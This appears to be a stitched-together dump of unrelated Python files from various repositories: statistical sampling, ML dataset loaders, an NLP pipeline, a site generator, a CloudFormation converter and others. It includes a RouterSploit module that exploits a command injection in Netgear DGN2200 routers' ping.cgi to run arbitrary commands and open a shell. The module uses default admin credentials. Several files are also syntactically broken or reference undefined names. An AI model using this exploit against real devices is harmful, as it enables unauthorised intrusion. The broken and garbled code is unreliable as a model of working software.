from __future__ import division from itertools import combinations from pandas import read_excel import numpy as np def birth(currentModel, u, dist, numbrk, q): sample = len(u) j = np.count_nonzero(currentModel == 0) L = len(currentModel) - j new = np.sort(currentModel) k = np.random.randint(low=dist, high=sample - dist+1) w = np.random.uniform(low=np.nextafter(0.0, 1.0)) if j < numbrk and not np.any(np.absolute(k * np.ones(shape=(L+j)) - new) <= dist * np.ones(shape=(L+j))): z = 1 kn = k new[j - 1] = kn bir = np.sort(new) j2 = np.count_nonzero(new == 0) d = (np.argwhere(bir == kn) + 1)[0][0] t2 = currentModel[np.sort(currentModel) != 0] if kn > np.max(t2): Q = np.ones(numbrk + 1,dtype=int) Q[:numbrk - j2 - 1] = q[:numbrk - j2 - 1] temp = [comb for comb in combinations([1, 2, 3], 2)] j = 0 G = 0 while j < 3 and G == 0: if np.all(temp[j] != np.ones(shape=(1,2)) * q[numbrk - j2 - 1]): G = 1 del temp[j] j += 1 a = np.random.uniform(low=np.nextafter(0.0, 1.0)) row = np.random.randint(low=1, high=3) if a < 1/3: Q[numbrk - j2 - 1:numbrk - j2 + 1] = list(temp[row - 1]) else: if a >= 1/3 and a < 2/3: Q[numbrk - j2 - 1:numbrk - j2 + 1] = list(temp[row - 1])[::-1] else: if a >= 2/3: Q[numbrk - j2 - 1:numbrk - j2 + 1] = np.ones(2,dtype=int) * q[numbrk - j2 - 1] Q[d - j2+1:numbrk + 1] = Q[d - j2] * np.ones(numbrk - d + j2, dtype=int) s = np.concatenate((np.asarray([q[numbrk - j2 - 1]]), np.asarray(Q[numbrk - j2 - 1:numbrk - j2 + 1])), axis=0) else: if kn < np.min(t2): Q = np.zeros(numbrk + 1, dtype=int) Q[2:numbrk + 1] = q[1:numbrk] temp = [comb for comb in combinations([1, 2, 3], 2)] j = 0 G = 0 while j < 3 and G == 0: if np.all(temp[j] != np.ones(shape=(1,2)) * q[0]): G = 1 del temp[j] j += 1 a = np.random.uniform(low=np.nextafter(0.0, 1.0)) row = np.random.randint(low=1, high=3) if a < 1/3: Q[:2] = list(temp[row - 1]) else: if a >= 1/3 and a < 2/3: Q[:2] = list(temp[row - 1])[::-1] else: if a >= 2/3: Q[:2] = np.ones(2,dtype=int) * q[0] s = np.concatenate((np.asarray([q[0]]), Q[:2]), axis=0) else: Q = np.zeros(numbrk + 1,dtype=int) Q[:d - j2 - 1]= q[:d - j2 - 1] temp = [comb for comb in combinations([1, 2, 3], 2)] j = 0 G = 0 while j < 3 and G == 0: if np.all(temp[j] != np.ones(shape=(1,2)) * q[d - j2 - 1]): G = 1 del temp[j] j += 1 a = np.random.uniform(low=np.nextafter(0.0, 1.0)) row = np.random.randint(low=1, high=3) if a < 1/3: Q[d - j2 - 1:d - j2 + 1] = list(temp[row - 1]) else: if a >= 1/3 and a < 2/3: Q[d - j2 - 1:d - j2 + 1] = list(temp[row - 1])[::-1] else: if a >= 2/3: Q[d - j2 - 1:d - j2 + 1] = np.ones(2,dtype=int) * q[d - j2 - 1] Q[d - j2 + 1: numbrk + 1] = q[d - j2:numbrk] s = np.concatenate((np.asarray([q[d - j2 - 1]]), Q[d - j2 - 1:d - j2 + 1]), axis=0) elif j == numbrk and not np.any(np.absolute(k * np.ones(shape=(L+j)) - new) <= dist * np.ones(shape=(L+j,1))): Q = np.ones(numbrk + 1,dtype=int) z = 1 kn = k new[j - 1] = kn bir = np.sort(new) temp = [comb for comb in combinations([1, 2, 3], 2)] j = 0 G = 0 while j < 3 and G == 0: if np.all(temp[j] != np.ones(shape=(1,2)) * q[0]): G = 1 del temp[j] j += 1 a = np.random.uniform(low=np.nextafter(0.0, 1.0)) row = np.random.randint(low=1, high=3) if a < 2/3: d = np.random.uniform(low=np.nextafter(0.0, 1.0)) if d < 1/2: Q[0] = temp[row - 1][0] Q[1:numbrk + 1] = np.ones(numbrk,dtype=int) * temp[row - 1][1] else: Q[0] = temp[row - 1][1] Q[1:numbrk + 1] = np.ones(numbrk,dtype=int) * temp[row - 1][0] else: Q = q s = np.concatenate((np.asarray([q[0]]), Q[:2]), axis=0) elif np.any(np.absolute(k * np.ones(shape=(L+j)) - new) <= dist * np.ones(shape=(L+j,1))): z = -3 bir = currentModel kn = k Q = q s = 0 result = {"bir": bir, "kn": kn, "s": s, "Q": Q, "q": q, "z": z} return result if __name__ == "__main__": df = read_excel("../data/artificial_data.xlsx", sheet_name='Sheet1') u = [] for index, row in df.iterrows(): u.append([float(row['u'])]) u = np.asarray(u, dtype=np.float32) dist = 30 numbrk = 5 currentModel = np.zeros(numbrk, dtype=np.uint32) currentModel[numbrk - 1] = 50 q = np.ones(numbrk + 1, dtype=np.uint32) result = birth(currentModel, u, dist, numbrk, q) print(result)
5,823
scores.py
jilljenn/TF-recomm
3
2172314
from collections import Counter, defaultdict import math import numpy as np import re def avgstd(l): # Displays mean and variance n = len(l) # print 'computed over %d values' % n mean = float(sum(l)) / n var = float(sum(i * i for i in l)) / n - mean * mean return '%.3f ± %.3f' % (round(mean, 3), round(1.96 * math.sqrt(var / (10 * n)), 3)) # return mean, round(1.96 * math.sqrt(var / n), 5) def get_scores(): values = defaultdict(lambda: []) logs = {} with open('3-pdf-fisher') as f: logs['fisher'] = f.read().splitlines() with open('3-pdf-random') as f: logs['random'] = f.read().splitlines() with open('3-pdf-popular') as f: logs['popular'] = f.read().splitlines() r = re.compile('^([0-9]+) +([0-9]+) +([0-9]+) .*mobo=([0-9.]+), rmse=([0-9.]+),.*mobo=([0-9.]+), rmse=([0-9.]+),') for model in logs.keys(): for line in logs[model]: m = r.match(line) if m: user_id, _, t, train_mobo, train_rmse, test_mobo, test_rmse = m.groups() t = int(t) values[model, 'train_mobo', t].append(float(train_mobo)) values[model, 'train_rmse', t].append(float(train_rmse)) values[model, 'test_mobo', t].append(float(test_mobo)) values[model, 'test_rmse', t].append(float(test_rmse)) BUDGET = 10 for t in range(BUDGET): for quantity in ['test_mobo', 'test_rmse']: # 'train_mobo', 'train_rmse', for model in logs.keys(): print(t, quantity, model, avgstd(values[model, quantity, t])) return values
1,638
dataset.py
akanametov/dcgan-pytorch
0
2172097
import glob import torch from PIL import Image from torch.utils.data import Dataset from utils import download_and_extract class CelebA(Dataset): """CelebA dataset.""" url="https://github.com/akanametov/dcgan-pytorch/releases/download/1.0/celeba.zip" def __init__(self, root, download=False, transform=None): if download: _ = download_and_extract(root, self.url) self.root=root self.files=sorted(glob.glob(f"{root}/celeba/img_align_celeba/*.jpg")) self.transform=transform self.download=download def __len__(self,): return len(self.files) def __getitem__(self, idx): img = Image.open(self.files[idx]).convert('RGB') if self.transform: img = self.transform(img) return img, torch.tensor([0]).long() class LSUN(Dataset): """LSUN(bedroom) dataset.""" url="https://github.com/akanametov/dcgan-pytorch/releases/download/1.0/lsun.zip" def __init__(self, root, download=False, transform=None): if download: _ = download_and_extract(root, self.url) self.root=root self.files=sorted(glob.glob(f"{root}/lsun/bedroom/0/*/*/*.jpg")) self.transform=transform self.download=download def __len__(self,): return len(self.files) def __getitem__(self, idx): img = Image.open(self.files[idx]).convert('RGB') if self.transform: img = self.transform(img) return img, torch.tensor([0]).long()
1,542
sciencebeam_gym/structured_document/svg.py
elifesciences/sciencebeam-gym
25
2171774
from sciencebeam_utils.utils.xml import ( set_or_remove_attrib ) from sciencebeam_gym.utils.bounding_box import ( BoundingBox ) from sciencebeam_gym.structured_document import ( AbstractStructuredDocument, get_scoped_attrib_name, get_attrib_by_scope ) SVG_NS = 'http://www.w3.org/2000/svg' SVG_NS_PREFIX = '{' + SVG_NS + '}' SVG_DOC = SVG_NS_PREFIX + 'svg' SVG_TEXT = SVG_NS_PREFIX + 'text' SVG_G = SVG_NS_PREFIX + 'g' SVG_RECT = SVG_NS_PREFIX + 'rect' SVG_VIEWBOX_ATTRIB = 'viewBox' SVG_TAG_ATTRIB = 'class' SVGE_NS = 'http://www.elifesciences.org/schema/svge' SVGE_NS_PREFIX = '{' + SVGE_NS + '}' SVGE_BOUNDING_BOX = SVGE_NS_PREFIX + 'bounding-box' SCOPED_TAG_ATTRIB_SUFFIX = 'tag' SVG_NSMAP = { None: SVG_NS, 'svge': SVGE_NS } class SvgStyleClasses(object): LINE = 'line' BLOCK = 'block' LINE_NO = 'line_no' def format_bounding_box(bounding_box): return '%s %s %s %s' % (bounding_box.x, bounding_box.y, bounding_box.width, bounding_box.height) def parse_bounding_box(bounding_box_str): if not bounding_box_str: return None x, y, width, height = bounding_box_str.split() return BoundingBox(float(x), float(y), float(width), float(height)) def get_node_bounding_box(t): attrib = t.attrib if SVGE_BOUNDING_BOX in attrib: return parse_bounding_box(attrib[SVGE_BOUNDING_BOX]) if SVG_VIEWBOX_ATTRIB in attrib: return parse_bounding_box(attrib[SVG_VIEWBOX_ATTRIB]) if not ('font-size' in attrib and 'x' in attrib and 'y' in attrib): return None font_size = float(attrib['font-size']) width = font_size * 0.8 * max(1, len(t.text)) return BoundingBox( float(attrib['x']), float(attrib['y']), width, font_size ) def _get_tag_attrib_name(scope, level): return ( SVGE_NS_PREFIX + get_scoped_attrib_name(SCOPED_TAG_ATTRIB_SUFFIX, scope=scope, level=level) if scope or level else SVG_TAG_ATTRIB ) class SvgStructuredDocument(AbstractStructuredDocument): def __init__(self, root_or_roots): if isinstance(root_or_roots, list): self.page_roots = root_or_roots else: self.page_roots = [root_or_roots] def get_pages(self): return self.page_roots def get_lines_of_page(self, page): return page.findall('.//{}[@class="{}"]'.format(SVG_G, SvgStyleClasses.LINE)) def get_tokens_of_line(self, line): return line.findall('./{}'.format(SVG_TEXT)) def get_x(self, parent): return parent.attrib.get('x') def get_text(self, parent): return parent.text def get_tag(self, parent, scope=None, level=None): return parent.attrib.get(_get_tag_attrib_name(scope, level)) def set_tag(self, parent, tag, scope=None, level=None): set_or_remove_attrib(parent.attrib, _get_tag_attrib_name(scope, level), tag) def get_tag_by_scope(self, parent): d = { k[len(SVGE_NS_PREFIX):]: v for k, v in get_attrib_by_scope(parent.attrib, SCOPED_TAG_ATTRIB_SUFFIX).items() if k.startswith(SVGE_NS_PREFIX) } tag = self.get_tag(parent) if tag: d[None] = tag return d def get_bounding_box(self, parent): return get_node_bounding_box(parent) def set_bounding_box(self, parent, bounding_box): parent.attrib[SVGE_BOUNDING_BOX] = format_bounding_box(bounding_box)
3,463
scripts_modules/colab_random_forest_regression.py
annapav7/NO2-tropomi_prediction_analysis
0
2171745
# -*- coding: utf-8 -*- """CoLab_Random Forest Regression.ipynb Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/1E4NOi3axBwvIHXiR47OKAAPzPMytJywY # NO2 Prediction by using Machine Learning Regression Analyses in Google Earth Engine ## **Machine Learning can create a Model to Predict specific value base on existing data set (dependent and independent values).** ## **Introduction** ### **Nitrogen Dioxide (NO2) air pollution**. The World Health Organization estimates that air pollution kills 4.2 million people every year. The main effect of breathing in raised levels of NO2 is the increased likelihood of respiratory problems. NO2 inflames the lining of the lungs, and it can reduce immunity to lung infections. There are connections between respiratory deceases / also exposure to viruses and more deadly cases. ##### ***Sources of NO2***: The rapid population growth, The fast urbanization: * Industrial facilities * Fossil fuels (coal, oil and gas) * Increase of transportation – 80 %. The affect air pollution (NO2): population health, and global warming. ## **Objective** The theme of this project is to create a Model to Predict specific value (NO2) for past years base on existing data set (Landsat and Sentinel-5P(TROPOMI) images) for 2019. These Prediction can be used for Monitoring and Statistical Analyses of developing NO2 over Time. """ """## **DataSet:** The Sentinel-5P satellite with TROPOspheric Monitoring Instrument (TROPOMI) instrument provides high spectral resolution (7x3.5 km2) for all spectral bands to register level of NO2. TROPOMI available from October 13, 2017. Landsat satellite launched in 1972 and images are available for more then 40 years. ## **Concept:** Regression: The model can make generalizations about new data. The model has been learned from the training data, and can be used to predict the result of test data: here, we might be given an x-value, and the model would allow us to predict the y value. By drawing this separating line, we have learned a model which can generalize to new data. ## 1._ Install libraries """ !pip install earthengine-api """## 2._ Establish connection""" !earthengine authenticate """**`Complete End to End Python code for Random Forest Regression:`**""" # Import necessary Libraries import pandas as pd import numpy as np import matplotlib.pyplot as plt import rasterio as rio from rasterio.plot import show # Import the data ( CSV formats) data = pd.read_csv('name_of_file.csv') data.head() # Store the Data in form of dependent and independent variables separatly X = data.ilog[:, 0:1].values y = data.ilog[:, 1].values # Import the Random Forest Regressor from sklearn.ensemble import RandomForestRegressor # Craete a Random Forest Regressor object from Random Forest Regressor Class RFReg = RandomForestRegressor(n_estimators = 100, random_state = 0) # Fit the random forest regressor with Training Data represented by X_train and y_train RFReg.fit(X_train, y_train) #Predicted Height from test dataset w.r.t Random Forest Regression y_predict_rfr = RFReg.predict((X_test)) #Model Evaluation using R-Square for Random Forest Regression from sklearn import metrics r_square = metrics.r2_score(y_test, y_predict_rfr) print('R-Square Error associated with Random Forest Regression is:', r_square) ''' Visualise the Random Forest Regression by creating range of values from min value of X_train to max value of X_train having a difference of 0.01 between two consecutive values''' X_val = np.arange(min(X_train), max(X_train), 0.01) #Reshape the data into a len(X_val)*1 array in order to make a column out of the X_val values X_val = X_val.reshape((len(X_val), 1)) #Define a scatter plot for training data plt.scatter(X_train, y_train, color = 'blue') #Plot the predicted data plt.plot(X_val, RFReg.predict(X_val), color = 'red') #Define the title plt.title('NO2 prediction using Random Forest Regression') #Define X axis label plt.xlabel('NDVI') #Define Y axis label plt.ylabel('Level of NO2') #Set the size of the plot for better clarity plt.figure(figsize=(1,1)) #Draw the plot plt.show() # Predicting Height based on Age using Random Forest Regression no2_pred = RFReg.predict([[41]]) print("Predicted NO2t: % d"% no2_pred) """**Model Evaluation**""" #Model Evaluation using Mean Square Error (MSE) print('Mean Squared Error:', metrics.mean_squared_error(y_test, y_predict)) #Model Evaluation using Root Mean Square Error (RMSE) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(y_test, y_predict))) #Model Evaluation using Mean Absolute Error (MAE) print('Mean Absolute Error:', metrics.mean_absolute_error(y_test, y_predict)) #Model Evaluation using R-Square from sklearn import metrics r_square = metrics.r2_score(y_test, y_predict) print('R-Square Error:', r_square) #For Illustration Purpose Only. #Considering Multiple Linear Equation with two Variables : grade = a0 + a1*time_to_study + a2*class_participation #Model Evaluation using Adjusted R-Square. # Here n = no. of observations and p = no. of independent variables n = 50 p = 2 Adj_r_square = 1-(1-r_square)*(n-1)/(n-p-1) print('Adjusted R-Square Error:', Adj_r_square)
5,299
core/TextProcessor.py
jakelever/VERSE
14
2172240
import sys import fileinput import argparse import time from collections import defaultdict, Counter import itertools import pickle import os import codecs import argparse from intervaltree import Interval, IntervalTree from DataLoad import * from SentenceModel import * from java.util import * from edu.stanford.nlp.pipeline import * from edu.stanford.nlp.ling.CoreAnnotations import * from edu.stanford.nlp.semgraph.SemanticGraphCoreAnnotations import * pipeline = None def getPipeline(): global pipeline if pipeline is None: props = Properties() props.put("annotators", "tokenize, ssplit, pos, lemma, depparse"); pipeline = StanfordCoreNLP(props, False) return pipeline def within(pos,start,end): return pos > start and pos < end from __builtin__ import zip # To deal with Jython conflict with java Zip package def parseTextWithTriggers(text,denotations,doTokenPreprocessing,knownEntities): pipeline = getPipeline() denotationTree = IntervalTree() for id,(_,positions,_) in denotations.iteritems(): for a,b in positions: denotationTree[a:b] = id if doTokenPreprocessing: prefixes = ["anti","phospho","translocation"] prefixes += [ s[0].upper()+s[1:] for s in prefixes ] suffixes = ["bound","degradable","driven","expressed","induced","induction","localized","luciferase","mediated","mediated way","nuclear","perforin","phosphorylated","Producing","promoter","promoting","secreting","silencing","simulated","transfected","translocation","costimulated","positve","regulated","responsive","independent","inducing","phosphorylation","stimulated","catalyzed","dimerization","expression","activated","reconstituted","associated","expressing","negative","producing","binding","positive","mediated","dependent","induced","deficient","protein","treatment"] suffixes += [ s[0].upper()+s[1:] for s in suffixes ] #print suffixes for prefix in prefixes: text = text.replace(prefix+"-",prefix+" ") for suffix in suffixes: text = text.replace("-"+suffix," "+suffix) newTokens = [] position = 0 for tmpToken in text.split(' '): startPos = position endPos = position + len(tmpToken) splitToken = None triggers = denotationTree[startPos:endPos] for interval in triggers: if within(interval.begin,startPos,endPos): #print word, interval, startPos, endPos, text[interval.begin:interval.end] #denotations[interval.data] #print "COOLA1\t%s\t%s" % (tmpToken,text[interval.begin:interval.end]) tmpSplitToken = text[interval.begin-1] if tmpSplitToken in ['-','/']: splitToken = tmpSplitToken break #print separator elif within(interval.end,startPos,endPos): #print "COOLA2\t%s\t%s" % (tmpToken,text[interval.begin:interval.end]) tmpSplitToken = text[interval.end] if tmpSplitToken in ['-','/']: splitToken = tmpSplitToken break #print tmpSplitToken position += len(tmpToken) + 1 if splitToken is None: newTokens.append(tmpToken) else: newTokens += tmpToken.split(splitToken) text = u" ".join(newTokens) allSentenceData = [] #print text document = pipeline.process(text) for sentence in document.get(SentencesAnnotation): tokens = [] triggerLocations = defaultdict(list) for i,token in enumerate(sentence.get(TokensAnnotation)): word = token.word() lemma = token.lemma() partofspeech = token.tag() startPos = token.beginPosition() endPos = token.endPosition() t = Token(word,lemma,partofspeech,startPos,endPos) tokens.append(t) triggers = denotationTree[startPos:endPos] for interval in triggers: triggerID = interval.data triggerLocations[triggerID].append(i) #if within(interval.begin,startPos,endPos) or within(interval.end,startPos,endPos): #if within(interval.begin,startPos,endPos): #print word, interval, startPos, endPos, text[interval.begin:interval.end] #denotations[interval.data] #print "COOL1\t%s\t%s" % (word,text[interval.begin:interval.end]) #elif within(interval.end,startPos,endPos): #print "COOL2\t%s\t%s" % (word,text[interval.begin:interval.end]) #print "-"*30 #print sentence #sys.exit(0) #dparse = sentence.get(BasicDependenciesAnnotation) dparse = sentence.get(CollapsedCCProcessedDependenciesAnnotation) dependencies = [] # Get the dependency graph for edge in dparse.edgeIterable(): governor = edge.getGovernor() governorIndex = governor.index() dependent = edge.getDependent() dependentIndex = dependent.index() rel = edge.getRelation().getLongName() dependencies.append((governorIndex-1, dependentIndex-1, rel)) # Let's gather up the information about the "known" triggers in the sentence (those from the A1 file) eventTriggerLocs, eventTriggerTypes, argumentTriggerLocs, argumentTriggerTypes = {},{},{},{} for triggerID,locs in triggerLocations.iteritems(): # Trigger is following tuple (typeName, positions, tokens) triggerType,_,_ = denotations[triggerID] if knownEntities is None or triggerType in knownEntities: argumentTriggerLocs[triggerID] = locs argumentTriggerTypes[triggerID] = triggerType else: eventTriggerLocs[triggerID] = locs eventTriggerTypes[triggerID] = triggerType sentenceData = SentenceModel(tokens, dependencies, eventTriggerLocs, eventTriggerTypes, argumentTriggerLocs, argumentTriggerTypes) allSentenceData.append(sentenceData) return allSentenceData def findEventTrigger(sentenceData,triggerid): for sentenceid, sentence in enumerate(sentenceData): if triggerid in sentence.predictedEntityLocs: return sentenceid,sentence.predictedEntityLocs[triggerid] raise RuntimeError('Unable to find location of event trigger ID ('+triggerid+') in sentences') def findArgumentTrigger(sentenceData): for sentenceid, sentence in enumerate(sentenceData): if triggerid in sentence.knownEntityLocs: return sentenceid,sentence.knownEntityLocs[triggerid] raise RuntimeError('Unable to find location of argument trigger ID ('+triggerid+') in sentences') def isComplexEvent(eventTrigger,arguments): if eventTrigger[0] == 'E': return True for _,id in arguments.iteritems(): if id[0] == 'E': return True return False #def associatedEvents(sentenceData,events,modifiers,coreferences,equivalences): # nonCom # complexEvents = [] # for eventid,event in events.iteritems(): # (eventName, eventTrigger, arguments) = event # isComplexEvent = False # Event(eventName, # It's the main bit. Yay! if __name__ == "__main__": argparser = argparse.ArgumentParser(description='Text parsing pipeline for a directory of text in ST or JSON format') argparser.add_argument('--inDir', required=True, type=str, help='Directory containing input files') argparser.add_argument('--format', default="ST", type=str, help='Format to load files (ST/JSON, default=ST)') argparser.add_argument('--splitTokensForGE4', action='store_true', help='Whether to split tokens using GE4 logic') argparser.add_argument('--knownEntities', help='Comma-separated list of entities that are known through-out') argparser.add_argument('--outFile', required=True, type=str, help='Output filename for parsed-text data') args = argparser.parse_args() assert args.format == "ST" or args.format == "JSON", "--format must be ST or JSON" inDir = args.inDir outFile = args.outFile print "inDir:", inDir print "outFile:", outFile if inDir[-1] != '/': inDir = inDir + '/' splitTokensForGE4 = False if args.splitTokensForGE4: splitTokensForGE4 = True knownEntities = None if args.knownEntities: knownEntities = set(args.knownEntities.split(",")) allSentenceAndEventData = {} for filename in os.listdir(inDir): if args.format == "ST" and filename.endswith(".txt"): filenameNoExt = filename[:-4] prefix = inDir + filenameNoExt txtFile = prefix + '.txt' a1File = prefix + '.a1' a2File = prefix + '.a2' print "### Processing %s ###" % txtFile assert os.path.exists(a1File), "Cannot find file: %s" % a1File text,denotations,relations,modifications = loadDataFromSTFormat(txtFile,a1File,a2File) sentenceData = parseTextWithTriggers(text,denotations,splitTokensForGE4,knownEntities) allSentenceAndEventData[filenameNoExt] = (sentenceData,relations,modifications) elif args.format == "JSON" and filename.endswith(".json"): filenameNoExt = filename[:-5] jsonFile = inDir + filenameNoExt + '.json' print "### Processing %s ###" % jsonFile text,denotations,relations,modifications = loadDataFromJSON(jsonFile) sentenceData = parseTextWithTriggers(text,denotations,splitTokensForGE4,knownEntities) allSentenceAndEventData[filenameNoExt] = (sentenceData,relations,modifications) with open(outFile, 'w') as f: pickle.dump(allSentenceAndEventData, f) print "Written to " + outFile
8,867
slipbox/generator.py
lggruspe/zettelpy
3
2170286
"""Generate site in output directory.""" from contextlib import contextmanager import json from pathlib import Path from shutil import copytree, move, rmtree from sqlite3 import Connection import typing as t from .app import App from .graph import ( create_graph, create_graph_data, get_cluster, get_components, get_note_titles, ) from .page import generate_index from .utils import temporary_directory data = Path(__file__).parent/"data" Generator = t.Callable[[Path], None] def clear(directory: Path) -> None: """Clear contents of directory. Create directory if it doesn't exist. """ directory.mkdir(exist_ok=True) for child in directory.iterdir(): if child.is_dir(): rmtree(child, ignore_errors=True) else: child.unlink() @contextmanager def output_directory_proxy(path: Path) -> t.Iterator[Path]: """Create proxy for output directory. Afterwards path is emptied and all contents of tempdir are moved into path. """ assert not path.exists() or path.is_dir() with temporary_directory() as tempdir: yield tempdir clear(path) for child in tempdir.iterdir(): move(str(child), str(path)) class IndexGenerator: """Generates index.html.""" def __init__(self, app: App): self.app = app def run(self, out: Path) -> None: """Generate index.html inside output directory.""" generate_index(self.app, out) def copy(source: Path, dest: Path) -> None: """Copy text from source to dest Path.""" dest.write_bytes(source.read_bytes()) def generate_js(out: Path) -> None: """Generate app.js inside output directory.""" copy(data/"app.min.js", out/"app.min.js") def generate_css(out: Path) -> None: """Generates style.css""" copy(data/"app.min.css", out/"app.min.css") copy(data/"style.css", out/"style.css") def generate_favicons(out: Path) -> None: """Copy favicons.""" for path in data.joinpath("favicons").iterdir(): if path.name != "about.txt": copy(path, out/path.name) def copy_boxicons(out: Path) -> None: """Copy boxicons svgs.""" copytree(data/"svg", out/"assets"/"boxicons"/"svg") def copy_mathjax(out: Path) -> None: """Copy mathjax files.""" copytree(data/"es5", out/"es5") class ImagesGenerator: """Copies images from database into output directory.""" def __init__(self, con: Connection): self.con = con def run(self, out: Path) -> None: """Copy images into output directory.""" (out/"images").mkdir() sql = "SELECT filename, binary FROM Images" for filename, binary in self.con.execute(sql): image = out/filename image.write_bytes(binary) class CytoscapeDataGenerator: """Generate JSONs for cytoscape.js.""" def __init__(self, con: Connection): self.con = con self.graph = create_graph(con) self.titles = dict(get_note_titles(self.con)) def write(self, path: Path, graph: t.Any, layout: str = "fdp") -> None: # noqa; # pylint: disable=no-self-use """Write graph JSON data to path.""" graph_data = create_graph_data(self.con, self.titles, graph, layout) path.write_text(json.dumps(graph_data)) def run(self, out: Path) -> None: """Generate JSONs for cytoscape.js in out/graph.""" (out/"graph").mkdir() layout = "dot" if self.graph.order() < 100 else "fdp" self.write(out/"graph"/"data.json", self.graph, layout) (out/"graph"/"tag").mkdir() for tag, in self.con.execute("SELECT DISTINCT tag FROM Tags"): path = out/"graph"/"tag"/f"{tag[1:]}.json" self.write(path, get_cluster(self.graph, tag), "dot") (out/"graph"/"note").mkdir() for component, subgraph in get_components(self.graph).items(): graph_data = create_graph_data( self.con, self.titles, subgraph, "dot", ) for note_id in component: path = out/"graph"/"note"/f"{note_id}.json" path.write_text(json.dumps(graph_data)) self.con.commit() def compile_site(app: App) -> None: """Copy files into output directory.""" assert app.root is not None con = app.database output_directory = app.root/app.config.output_directory with output_directory_proxy(output_directory) as tempdir: CytoscapeDataGenerator(con).run(tempdir) ImagesGenerator(con).run(tempdir) IndexGenerator(app).run(tempdir) generate_css(tempdir) generate_js(tempdir) generate_favicons(tempdir) copy_boxicons(tempdir) copy_mathjax(tempdir)
4,788
src/generated-spec/work_spaces.py
wheerd/cloudformation-to-terraform
0
2171342
from . import * class AWS_WorkSpaces_Workspace_WorkspaceProperties(CloudFormationProperty): def write(self, w): with w.block("workspace_properties"): self.property(w, "ComputeTypeName", "compute_type_name", StringValueConverter()) self.property(w, "RootVolumeSizeGib", "root_volume_size_gib", BasicValueConverter()) self.property(w, "RunningMode", "running_mode", StringValueConverter()) self.property(w, "RunningModeAutoStopTimeoutInMinutes", "running_mode_auto_stop_timeout_in_minutes", BasicValueConverter()) self.property(w, "UserVolumeSizeGib", "user_volume_size_gib", BasicValueConverter()) class AWS_WorkSpaces_Workspace(CloudFormationResource): cfn_type = "AWS::WorkSpaces::Workspace" tf_type = "aws_workspaces_workspace" ref = "id" attrs = {} # Additional TF attributes: computer_name, ip_address, state def write(self, w): with self.resource_block(w): self.property(w, "BundleId", "bundle_id", StringValueConverter()) self.property(w, "DirectoryId", "directory_id", StringValueConverter()) self.property(w, "RootVolumeEncryptionEnabled", "root_volume_encryption_enabled", BasicValueConverter()) self.property(w, "Tags", "tags", ListValueConverter(ResourceTag())) self.property(w, "UserName", "user_name", StringValueConverter()) self.property(w, "UserVolumeEncryptionEnabled", "user_volume_encryption_enabled", BasicValueConverter()) self.property(w, "VolumeEncryptionKey", "volume_encryption_key", StringValueConverter()) self.block(w, "WorkspaceProperties", AWS_WorkSpaces_Workspace_WorkspaceProperties)
1,620
Adder&Subtractor/adder+subtractor module/testbench& SW/adder-test.py
AymanAzzam/ODE-Solver
0
2172579
import sys f = open("testfile.txt", "r") out = open("test_out.txt", "w") x = f.readline() while x: numbers = x.split() A = numbers[0] B = numbers[1] result = bin(int(A,2) + int(B,2)) # out.write(A+"\n") #out.write(B+"\n") result = int(result,2) result = str(result) out.write(result+"\n") x = f.readline() out.close() f.close()
389
Python/python code samples/test cases/FileTestSuite.py
mrvtoney/Projects
0
2171834
import unittest import os class FileTestSuite(unittest.TestCase) def test_if_file_exist(self) : path = "C:\Ussers\Vince\Desktop\do_not_exist.txt" self.assertTrue(!os.path.isfile( path ), 'The file should not exist') def test_if_html_contains_div(self) html = "<body><div>here</div></body>" pos = html.find('<div>') self.assertTrue( len(pos) == 1, 'The HTML does contain div\'s') def test_if_html_does_not_contain_a_div(self) html = "<body>walla walla washington</body>" pos = html.find('<div>') self.assert( pos == -1, "The HTML does not contain div's") def refactor(aList): sum = 0 if len(aList) == 0: return False, 0 for eachItem in aList: isValidNumber = str(eachItem).isdigit() if isValidNumber == False: return False, 0 else: sum = sum + eachItem return True, sum def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(UnitTestSuite)) return suite
939
DIZED_APPS/INCANTATION/modules/exploits/routers/netgear/dgn2200_ping_cgi_rce.py
tanc7/ArmsCommander-TestBed
1
2172078
from routersploit import ( exploits, print_error, print_success, print_status, mute, validators, http_request, random_text, shell, ) class Exploit(exploits.Exploit): """ Exploits Netgear DGN2200 RCE vulnerability in ping.cgi """ __info__ = { 'name': 'Netgear DGN2200 RCE', 'description': 'Exploits Netgear DGN2200 RCE vulnerability in the ping.cgi script', 'authors': [ 'SivertPL', # vulnerability discovery '<NAME> <<EMAIL>[at]<EMAIL>>', # routesploit module ], 'references': [ 'https://www.exploit-db.com/exploits/41394/', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6077', ], 'devices': [ 'Netgear DGN2200v1', 'Netgear DGN2200v2', 'Netgear DGN2200v3', 'Netgear DGN2200v4', ], } target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address port = exploits.Option(80, 'Target Port') # target port login = exploits.Option('admin', 'Username') password = exploits.Option('password', 'Password') def run(self): """ Method run on "exploit" or "run" command (both works the same way). It should result in exploiting target. """ if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mipsbe") else: print_error("Target is not vulnerable") def execute(self, command): url = "{}:{}/ping.cgi".format(self.target, self.port) data = {'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping': "Ping", 'ping_IPAddr': "12.12.12.12; " + command} referer = "{}/DIAG_diag.htm".format(self.target) headers = {'referer': referer} r = http_request(method="POST", url=url, data=data, auth=(self.login, self.password), headers=headers) if r is None: return "" result = self.parse_output(r.text) return result.encode('utf-8') def parse_output(self, text): yet = False result = [] for line in text.splitlines(): if line.startswith("<textarea"): yet = True continue if yet: if line.startswith("</textarea>"): break result.append(line) return "\n".join(result) @mute def check(self): """ Method that verifies if the target is vulnerable. """ rand_marker = random_text(6) command = "echo {}".format(rand_marker) if rand_marker in self.execute(command): return True return False
2,836
antigen_discovery/nepitope/peptide_utilities.py
Mazzafish/neoantigen
2
2170417
